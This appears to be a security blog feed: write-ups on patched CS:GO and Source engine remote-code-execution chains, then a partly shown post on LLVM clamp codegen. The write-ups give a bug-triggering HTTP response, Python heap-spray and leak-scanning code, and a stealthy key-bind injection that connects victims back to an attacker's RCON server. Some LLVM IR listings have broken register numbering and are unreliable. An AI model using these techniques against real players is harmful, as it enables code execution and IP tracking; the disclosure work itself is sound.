The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-Up, no response from Valve
10.04.2021 Disclosure of Bug existance via twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

CVE-2021-30481: Source engine remote code execution via game invites

20 April 2021 at 00:00
By: floesen

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image 1 shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

A look at LLVM - comparing clamp implementations

9 April 2021 at 00:00
By: duk

Please note that this is not an endorsement or criticism of either of these languages. It’s simply something I found interesting with how LLVM handles code generation between the two. This is an implementation quirk, not a language issue.

Update (April 9, 2021): A bug report was filed and a fix was pushed!

The LLVM project is a modular set of tools that make designing and implementing a compiler significantly easier. The most well known part of LLVM is their intermediate representation; IR for short. LLVM’s IR is an extremely powerful tool, designed to make optimization and targeting many architectures as easy as possible. Many tools use LLVM IR; the Clang C++ compiler and the Rust compiler (rustc) are both notable examples. However, despite this unified architecture, code generation can still vary wildly between implementations and how the IR is used. Some time ago, I stumbled upon this tweet discussing Rust’s implementation of clamping compared to C++:

Rust 1.50 is out and has f32.clamp. I had extremely low expectations for performance based on C++ experience but as usual Rust proves to be "C++ done right".

Of course Zig already has clamp and also gets codegen right. pic.twitter.com/0WI1fLrQaB

— Arseny Kapoulkine (@zeuxcg) February 11, 2021

Rust’s code generation on the latest version of LLVM is far superior compared to an equivalent Clang version using std::clamp, even though they use the same underlying IR:

With f32.clamp:

pub fn clamp(v: f32) -> f32 {
    v.clamp(-1.0, 1.0)
}

The corresponding assembly is shown below. It is short, concise, and pretty much the best you’re going to get. We can see two memory accesses to get the clamp bounds and efficient use of x86 instructions.

.LCPI0_0:
        .long   0xbf800000
.LCPI0_1:
        .long   0x3f800000
example::clamp:
        movss   xmm1, dword ptr [rip + .LCPI0_0]
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI0_1]
        minss   xmm0, xmm1
        ret

Next is a short C++ program using std::clamp:

#include <algorithm>
float clamp2(float v) {
    return std::clamp(v, -1.f, 1.f);
}

The corresponding assembly is shown below. It is significantly longer with many more data accesses, conditional moves, and is in general uglier.

.LCPI1_0:
        .long   0x3f800000                         float 1
.LCPI1_1:
        .long   0xbf800000                         float -1
clamp2(float):                                     @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0
        mov     dword ptr [rsp - 8], -1082130432  
        mov     dword ptr [rsp - 12], 1065353216  
        ucomiss xmm0, dword ptr [rip + .LCPI1_0]  
        lea     rax, [rsp - 12]
        lea     rcx, [rsp - 4]
        cmova   rcx, rax
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0
        lea     rax, [rsp - 8]
        cmovbe  rax, rcx
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

Interestingly enough, reimplementing std::clamp causes this issue to disappear:

float clamp(float v, float lo, float hi) {
    v = (v < lo) ? lo : v;
    v = (v > hi) ? hi : v;
    return v;
}

float clamp1(float v) {
    return clamp(v, -1.f, 1.f);
}

The assembly generated here is the same as with Rust’s implementation:

.LCPI0_0:
        .long   0xbf800000                        # float -1
.LCPI0_1:  
        .long   0x3f800000                        # float 1
clamp1(float):                                    # @clamp1(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0 
        movss   xmm0, dword ptr [rip + .LCPI0_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Clearly, something is off between std::clamp and our implementation. According to the C++ reference, std::clamp takes two references along with a predicate (which defaults to std::less) and returns a reference. Functionally, the only difference between our code and std::clamp is that we do not use reference types. Knowing this, we can then reproduce the issue.

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

Once again, we’ve generated the same bad code as with std::clamp:

.LCPI1_0:
        .long   0x3f800000                        # float 1
.LCPI1_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0 
        mov     dword ptr [rsp - 8], -1082130432 
        mov     dword ptr [rsp - 12], 1065353216 
        ucomiss xmm0, dword ptr [rip + .LCPI1_0] 
        lea     rax, [rsp - 12] 
        lea     rcx, [rsp - 4] 
        cmova   rcx, rax 
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0 
        lea     rax, [rsp - 8] 
        cmovbe  rax, rcx 
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

LLVM IR and Clang

LLVM IR is a Static Single Assignment (SSA) intermediate representation. What this means is that every variable is only assigned to once. In order to represent conditional assignments, SSA form uses a special type of instruction called a “phi” node, which picks a value based on the block that was previously running. However, Clang does not initially use phi nodes. Instead, to make initial code generation easier, variables in functions are allocated on the stack using alloca instructions. Reads and assignments to the variable are load and store instructions to the alloca, respectively:

int main() {
    float x = 0;
}

In this unoptimized IR, we can see an alloca instruction that then has the float value 0 stored to it:

define dso_local i32 @main() #0 {
  %1 = alloca float, align 4
  store float 0.000000e+00, float* %1, align 4
  ret i32 0
}

LLVM will then (hopefully) optimize away the alloca instructions with a relevant pass, like SROA.

LLVM IR and reference types

Reference types are represented as pointers in LLVM IR:

void test(float& x2) {
    x2 = 1;
}

In this optimized IR, we can see that the reference has been converted to a pointer with specific attributes.

define dso_local void @_Z4testRf(float* nocapture nonnull align 4 dereferenceable(4) %0) local_unnamed_addr #0 {
  store float 1.000000e+00, float* %0, align 4, !tbaa !2
  ret void
}

When a function is given a reference type as an argument, it is passed the underlying object’s address instead of the object itself. Also passed is some metadata about reference types. For example, nonnull and dereferenceable are set as attributes to the argument because the C++ standard dictates that references always have to be bound to a valid object. For us, this means the alloca instructions are passed directly to the clamp function:

__attribute__((noinline)) const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

In this optimized IR, we can see alloca instructions passed to bad_clamp corresponding to the variables passed as references.

define linkonce_odr dso_local nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %0, float* nonnull align 4 dereferenceable(4) %1, float* nonnull align 4 dereferenceable(4) %2) local_unnamed_addr #2 comdat {
  %4 = load float, float* %0, align 4
  %5 = load float, float* %1, align 4
  %6 = fcmp olt float %4, %5
  %7 = load float, float* %2, align 4
  %8 = fcmp ogt float %4, %7
  %9 = select i1 %8, float* %2, float* %0
  %10 = select i1 %6, float* %1, float* %9
  ret float* %10
}

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #1 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4
  store float -1.000000e+00, float* %3, align 4
  store float 1.000000e+00, float* %4, align 4                                                                                                                                         
  %6 = call nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %2, float* nonnull align 4 dereferenceable(4) %3, float* nonnull align 4 dereferenceable(4) %4)
  %7 = load float, float* %7, align 4
  ret float %7
}

Lifetime annotations are omitted to make the IR a bit clearer.

In this example, the noinline attribute was used to demonstrate passing references to functions. If we remove the attribute, the call is inlined into the function:

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}
float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

However, even after optimization, the alloca instructions are still there for seemingly no good reason. These alloca instructions should have been optimized away by LLVM’s passes; they’re not used anywhere else and there are no tricky stores or lifetime problems.

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #0 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4, !tbaa !2
  store float -1.000000e+00, float* %3, align 4, !tbaa !2
  store float 1.000000e+00, float* %4, align 4, !tbaa !2
  %5 = fcmp olt float %0, -1.000000e+00
  %6 = fcmp ogt float %0, 1.000000e+00
  %7 = select i1 %8, float* %4, float* %2
  %9 = select i1 %7, float* %3, float* %9
  %9 = load float, float* %10, align 4, !tbaa !2
  ret float %9
}

The only candidate here is the two sequential select instructions, as they operate on the pointers created by the alloca instructions instead of the underlying value. However, LLVM also has a pass for this; if possible, LLVM will try to “speculate” across select instructions that load their results.

select instructions are essentially ternary operators that pick one of the last two operands (float pointers in our case) based on the value of the first operand.

Select speculation - where things go wrong

A few calls down the chain, this function calls isDereferenceableAndAlignedPointer, which is what determines whether a pointer can be dereferenced. The code here exposes the main issue: the select instruction is never considered ‘dereferenceable’. As such, when there are two selects in sequence (as seen with our std::clamp), it will not try to speculate the select instruction and will not remove the alloca.

Fix 1: libcxx

A potential fix is modifying the original code to not produce select instructions in the same way. For example, we can mimic our original implementation with pointers instead of value types. Though the IR output change is relatively small, this gives us the code generation we want without modifying the LLVM codebase:

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

float clamp3(float v) {
    return better_ref_clamp(v, -1.f, 1.f);
}

As you can see, the IR generated after the call is inlined is significantly shorter and more efficient than before:

define dso_local float @_Z6clamp3f(float %0) local_unnamed_addr #1 {
  %2 = fcmp olt float %0, -1.000000e+00
  %3 = select i1 %2, float -1.000000e+00, float %0
  %4 = fcmp ogt float %3, 1.000000e+00
  %5 = select i1 %4, float 1.000000e+00, float %3
  ret float %5
}

And the corresponding assembly is back to what we want it to be:

.LCPI1_0:
        .long   0xbf800000                        # float -1
.LCPI1_1:
        .long   0x3f800000                        # float 1
clamp3(float):                                    # @clamp3(float)
        movss   xmm1, dword ptr [rip + .LCPI1_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0
